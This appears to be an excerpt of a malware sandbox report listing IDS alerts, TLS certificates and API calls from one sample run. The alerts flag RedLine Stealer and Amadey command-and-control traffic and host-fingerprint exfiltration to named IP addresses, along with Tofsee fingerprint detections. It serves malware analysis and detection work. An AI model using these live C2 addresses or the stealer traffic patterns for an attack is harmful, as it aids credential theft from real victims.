TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 77.91.124.55:19071 -> 192.168.56.103:49290	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49324 -> 142.251.222.206:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 77.91.68.52:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 5.42.92.88:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 5.42.92.88:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49222 -> 172.217.24.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49172 -> 5.42.92.88:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49240 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49239 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49253 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49268 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49270 -> 172.217.24.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49310 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49314 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49325 -> 142.251.222.206:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49172 -> 5.42.92.88:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49186 -> 77.91.124.1:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.103:49186 -> 77.91.124.1:80	2045751	ET MALWARE Win32/Amadey Bot Activity (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49186 -> 77.91.124.1:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49186 -> 77.91.124.1:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49186 -> 77.91.124.1:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 192.168.56.103:49186 -> 77.91.124.1:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 77.91.124.55:19071 -> 192.168.56.103:49203	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49233 -> 5.42.92.88:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49237 -> 216.58.200.228:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49244 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49248 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49251 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49252 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49258 -> 142.250.207.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49261 -> 172.217.25.13:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49203 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49296 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49298 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49301 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49312 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49215 172.217.25.13:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	4a:5a:3c:9d:ec:4d:02:20:de:b6:76:11:1c:40:b5:78:e9:aa:a6:0d
TLSv1 192.168.56.103:49221 172.217.24.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	24:e0:20:dc:de:e3:a8:d9:a8:17:ba:26:f5:41:32:19:98:d0:30:f3
TLSv1 192.168.56.103:49216 172.217.25.13:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	4a:5a:3c:9d:ec:4d:02:20:de:b6:76:11:1c:40:b5:78:e9:aa:a6:0d
TLSv1 192.168.56.103:49246 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49247 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49242 142.251.222.206:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	09:1e:68:9f:bd:40:4b:47:8d:ac:be:fe:ef:35:d6:52:c1:a0:ec:9f
TLSv1 192.168.56.103:49243 142.251.222.206:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	09:1e:68:9f:bd:40:4b:47:8d:ac:be:fe:ef:35:d6:52:c1:a0:ec:9f
TLSv1 192.168.56.103:49245 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49236 216.58.200.228:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	c9:f6:98:54:a9:56:99:75:0a:10:b7:bd:95:70:40:74:3a:b0:b0:77
TLSv1 192.168.56.103:49250 157.240.215.14:443	None	None	None
TLSv1 192.168.56.103:49269 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net	04:f1:7c:55:c3:7e:a3:bf:72:72:37:75:24:a0:6a:89:af:bd:19:ed
TLSv1 192.168.56.103:49249 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49273 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net	04:f1:7c:55:c3:7e:a3:bf:72:72:37:75:24:a0:6a:89:af:bd:19:ed
TLSv1 192.168.56.103:49275 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49255 142.250.199.74:443	None	None	None
TLSv1 192.168.56.103:49254 142.250.199.74:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=upload.video.google.com	73:c0:b4:ab:41:0a:6a:68:d4:ae:ee:e2:11:a4:38:23:ef:d2:86:b7
TLSv1 192.168.56.103:49257 142.250.207.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	24:e0:20:dc:de:e3:a8:d9:a8:17:ba:26:f5:41:32:19:98:d0:30:f3
TLSv1 192.168.56.103:49259 142.250.207.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	24:e0:20:dc:de:e3:a8:d9:a8:17:ba:26:f5:41:32:19:98:d0:30:f3
TLSv1 192.168.56.103:49262 172.217.25.13:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	4a:5a:3c:9d:ec:4d:02:20:de:b6:76:11:1c:40:b5:78:e9:aa:a6:0d
TLSv1 192.168.56.103:49265 142.251.222.206:443	None	None	None
TLSv1 192.168.56.103:49267 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49271 172.217.24.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	24:e0:20:dc:de:e3:a8:d9:a8:17:ba:26:f5:41:32:19:98:d0:30:f3
TLSv1 192.168.56.103:49276 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49299 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49266 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49303 157.240.215.14:443	None	None	None
TLSv1 192.168.56.103:49264 142.251.222.206:443	None	None	None
TLSv1 192.168.56.103:49272 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net	04:f1:7c:55:c3:7e:a3:bf:72:72:37:75:24:a0:6a:89:af:bd:19:ed
TLSv1 192.168.56.103:49302 157.240.215.14:443	None	None	None
TLSv1 192.168.56.103:49307 157.240.215.14:443	None	None	None
TLSv1 192.168.56.103:49317 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49305 157.240.215.14:443	None	None	None
TLSv1 192.168.56.103:49322 172.217.25.13:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	4a:5a:3c:9d:ec:4d:02:20:de:b6:76:11:1c:40:b5:78:e9:aa:a6:0d
TLSv1 192.168.56.103:49311 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net	04:f1:7c:55:c3:7e:a3:bf:72:72:37:75:24:a0:6a:89:af:bd:19:ed
TLSv1 192.168.56.103:49300 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49329 172.217.24.227:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	24:e0:20:dc:de:e3:a8:d9:a8:17:ba:26:f5:41:32:19:98:d0:30:f3
TLSv1 192.168.56.103:49309 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49330 172.217.24.227:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	24:e0:20:dc:de:e3:a8:d9:a8:17:ba:26:f5:41:32:19:98:d0:30:f3
TLSv1 192.168.56.103:49323 172.217.25.13:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	4a:5a:3c:9d:ec:4d:02:20:de:b6:76:11:1c:40:b5:78:e9:aa:a6:0d
TLSv1 192.168.56.103:49313 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net	04:f1:7c:55:c3:7e:a3:bf:72:72:37:75:24:a0:6a:89:af:bd:19:ed
TLSv1 192.168.56.103:49327 142.250.199.74:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=upload.video.google.com	73:c0:b4:ab:41:0a:6a:68:d4:ae:ee:e2:11:a4:38:23:ef:d2:86:b7
TLSv1 192.168.56.103:49297 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49333 142.250.66.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	24:e0:20:dc:de:e3:a8:d9:a8:17:ba:26:f5:41:32:19:98:d0:30:f3
TLSv1 192.168.56.103:49328 142.250.199.74:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=upload.video.google.com	73:c0:b4:ab:41:0a:6a:68:d4:ae:ee:e2:11:a4:38:23:ef:d2:86:b7
TLSv1 192.168.56.103:49332 142.250.66.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	24:e0:20:dc:de:e3:a8:d9:a8:17:ba:26:f5:41:32:19:98:d0:30:f3
TLSv1 192.168.56.103:49331 142.250.66.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	24:e0:20:dc:de:e3:a8:d9:a8:17:ba:26:f5:41:32:19:98:d0:30:f3
TLSv1 192.168.56.103:49304 157.240.215.14:443	None	None	None
TLSv1 192.168.56.103:49306 157.240.215.14:443	None	None	None
TLSv1 192.168.56.103:49316 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49324 142.251.222.206:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	09:1e:68:9f:bd:40:4b:47:8d:ac:be:fe:ef:35:d6:52:c1:a0:ec:9f
TLSv1 192.168.56.103:49222 172.217.24.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	24:e0:20:dc:de:e3:a8:d9:a8:17:ba:26:f5:41:32:19:98:d0:30:f3
TLSv1 192.168.56.103:49240 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49239 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49253 157.240.215.14:443	None	None	None
TLSv1 192.168.56.103:49268 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net	04:f1:7c:55:c3:7e:a3:bf:72:72:37:75:24:a0:6a:89:af:bd:19:ed
TLSv1 192.168.56.103:49270 172.217.24.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	24:e0:20:dc:de:e3:a8:d9:a8:17:ba:26:f5:41:32:19:98:d0:30:f3
TLSv1 192.168.56.103:49310 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49314 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net	04:f1:7c:55:c3:7e:a3:bf:72:72:37:75:24:a0:6a:89:af:bd:19:ed
TLSv1 192.168.56.103:49325 142.251.222.206:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	09:1e:68:9f:bd:40:4b:47:8d:ac:be:fe:ef:35:d6:52:c1:a0:ec:9f
TLSv1 192.168.56.103:49237 216.58.200.228:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	c9:f6:98:54:a9:56:99:75:0a:10:b7:bd:95:70:40:74:3a:b0:b0:77
TLSv1 192.168.56.103:49244 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49248 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49251 157.240.215.14:443	None	None	None
TLSv1 192.168.56.103:49252 157.240.215.14:443	None	None	None
TLSv1 192.168.56.103:49258 142.250.207.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	24:e0:20:dc:de:e3:a8:d9:a8:17:ba:26:f5:41:32:19:98:d0:30:f3
TLSv1 192.168.56.103:49261 172.217.25.13:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	4a:5a:3c:9d:ec:4d:02:20:de:b6:76:11:1c:40:b5:78:e9:aa:a6:0d
TLSv1 192.168.56.103:49296 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49298 157.240.215.14:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com	e4:f4:1f:ec:36:38:21:65:ee:b4:e0:ea:11:66:d9:36:2a:f3:d9:18
TLSv1 192.168.56.103:49301 157.240.215.14:443	None	None	None
TLSv1 192.168.56.103:49312 157.240.215.35:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA	C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net	04:f1:7c:55:c3:7e:a3:bf:72:72:37:75:24:a0:6a:89:af:bd:19:ed

Queries for the computername (50 out of 60 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
